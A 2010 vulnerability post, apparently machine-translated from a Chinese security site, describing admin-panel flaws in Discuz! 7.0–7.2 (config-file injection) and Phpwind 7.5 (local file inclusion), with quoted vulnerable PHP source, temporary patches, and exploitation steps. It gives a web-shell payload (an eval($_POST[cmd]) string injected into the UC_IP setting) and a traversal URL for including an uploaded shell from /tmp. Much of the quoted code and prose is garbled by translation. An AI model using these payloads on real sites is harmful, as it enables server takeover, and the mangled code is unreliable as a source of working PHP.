Discuz! 7.0-7.2 & Phpwind7. 5 Background tasteless vulnerability-vulnerability warning-the black bar safety net

2010-01-16T00:00:00
ID MYHACK58:62201025948
Type myhack58
Reporter 佚名
Modified 2010-01-16T00:00:00

Description

|

Transfer from t00ls

A lot of people there, spread out, and then sent to. Now the loophole if the initiative is published, is definitely“no. do not publish”, otherwise is definitely hiding unless someone else posted. DZ tasteless that need the Creator's permission, the Creator of the password is generally more difficult to engage, and pw tasteless that need to be truncated or linux marginalia write a shell to the tmp.

One, discuz background settings. inc. php to write shell vulnerability:

Vulnerability details:

if($operation == 'uc' && is_writeable('./ config.inc.php') && $isfounder) { $ucdbpassnew = $settingsnew['uc']['dbpass'] == '**' ? UC_DBPW : $settingsnew['uc']['dbpass']; if($settingsnew['uc']['connect']) { $uc_dblink = @mysql_connect($settingsnew['uc']['dbhost'], $settingsnew['uc']['dbuser'], $ucdbpassnew, 1); if(!$ uc_dblink) { cpmsg('uc_database_connect_error', ", 'error'); } else { mysql_close($uc_dblink); } }

$fp = fopen('./ config.inc.php', 'r'); $configfile = fread($fp, filesize('./ config.inc.php')); $configfile = trim($configfile); $configfile = substr($configfile, -2) == '?& gt;' ? substr($configfile, 0, -2) : $configfile; fclose($fp);

$connect = "; if($settingsnew['uc']['connect']) { require './ config.inc.php'; $connect = 'mysql'; $samelink = ($dbhost == $settingsnew['uc']['dbhost'] && $dbuser == $settingsnew['uc']['dbuser'] && $dbpw == $ucdbpassnew); $samecharset = ! ($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk'); $configfile = insertconfig($configfile, "/define\('UC_DBHOST',\s'.?'\);/ i", "define('UC_DBHOST', '".$ settingsnew['uc']['dbhost']."');");// Regular expression From'To')is replaced, and')may be optionally submitted, from, oldjun.com $configfile = insertconfig($configfile, "/define\('UC_DBUSER',\s'.?'\);/ i", "define('UC_DBUSER', '".$ settingsnew['uc']['dbuser']."');"); $configfile = insertconfig($configfile, "/define\('UC_DBPW',\s'.?'\);/ i", "define('UC_DBPW', '".$ ucdbpassnew."');"); $configfile = insertconfig($configfile, "/define\('UC_DBNAME',\s'.?'\);/ i", "define('UC_DBNAME', '".$ settingsnew['uc']['dbname']."');"); $configfile = insertconfig($configfile, "/define\('UC_DBTABLEPRE',\s'.?'\);/ i", "define('UC_DBTABLEPRE', "".$ settingsnew['uc']['dbname'].".'.$ settingsnew['uc']['dbtablepre']."');"); //$configfile = insertconfig($configfile, "/define\('UC_LINK',\s'?.?'?\);/ i", "define('UC_LINK', ". ($samelink && $samecharset ? 'TRUE' : 'FALSE').");"); } $configfile = insertconfig($configfile, "/define\('UC_CONNECT',\s'.?'\);/ i", "define('UC_CONNECT', '$connect');"); $configfile = insertconfig($configfile, "/define\('UC_KEY',\s'.?'\);/ i", "define('UC_KEY', '".$ settingsnew['uc']['key']."');"); $configfile = insertconfig($configfile, "/define\('UC_API',\s'.?'\);/ i", "define('UC_API', '".$ settingsnew['uc']['api']."');"); $configfile = insertconfig($configfile, "/define\('UC_IP',\s'.?'\);/ i", "define('UC_IP', '".$ settingsnew['uc']['ip']."');"); $configfile = insertconfig($configfile, "/define\('UC_APPID',\s'?.?'?\);/ i", "define('UC_APPID', '".$ settingsnew['uc']['appid']."');");

$fp = fopen('./ config.inc.php', 'w'); if(! ($fp = @fopen('./ config.inc.php', 'w'))) { cpmsg('uc_config_write_error', ", 'error'); } @fwrite($fp, trim($configfile)); @fclose($fp); } settings. inc. php to submit the data to the lack of effective filtering, the result can be written')pollution profile data, and insertconfig function of the canonical match unable to correctly match to the last, the lead may be subjected to 2 times the input can successfully bypass the daddslashes the shell write into the configuration file.

function insertconfig($s, $find, $replace) { if(preg_match($find, $s)) { $s = preg_replace($find, $replace, $s);//regular expression to match the replacement data } else { $s .= "\r\n".$ replace; } return $s; } Vulnerability test:

Step one: UC_IP(UC_IP is optional, just write generally does not affect program operation)is written in the contamination of the data: xxx');eval($_POST[cmd])?& gt;to submit; Step two: UC_IP just enter aaa, a regular match just a match to'), then automatically put a semicolon before the closing.

Temporary patch:

In the if($operation == 'uc' && is_writeable('./ config.inc.php') && $isfounder) {under add:

foreach($settingsnew['uc'] as $key => $value){ $settingsnew['uc'][$key]=str_replace(')',",$value); }

Second, phpwind background local contains the vulnerability:

Vulnerability details:

File: hack\rate\admin.php Source:

<? php ! function_exists('readover') && exit('Forbidden'); define ( "H_R", R_P . "hack/rate/" ); define ( "L_R", R_P . "lib/" ); InitGP ( array ('ajax' ) ); $action = via strtolower ( ($job) ? $job : "admin" ); $filepath = H_R . "action/" . $action . "Action.php";

(! file_exists ( $filepath )) && exit ();

if ($job != "ajax") { require H_R . '/template/layout.php'; } else { require_once $filepath; }

?& gt; 再 看看 hack\rate\template\layout.php to:

<? php ! function_exists('readover') && exit('Forbidden'); the include_once PrintEot ( 'left' ); print <<<EOT --> EOT; require_once $filepath; the include_once PrintEot ( 'adminbottom' ); ?& gt; $job can be customized to trigger a local include, but addslashes, and therefore can not pass%0 0 truncated; but by a number of///////truncated, or directly in the tmp folder and write a shell to contain. Specific not much to say, the use of the approach:

Vulnerability test:

The first in the tmp Upload a shell, 名为Action.php Then visit: http://127.0.0.1/pw/admin.php?ad ... ../../../../../ tmp/

Temporary patch:

$filepath = H_R . "action/" . $action . "Action.php"; Replaced by: $filepath = Pcv(H_R . "action/" . $action . "Action.php");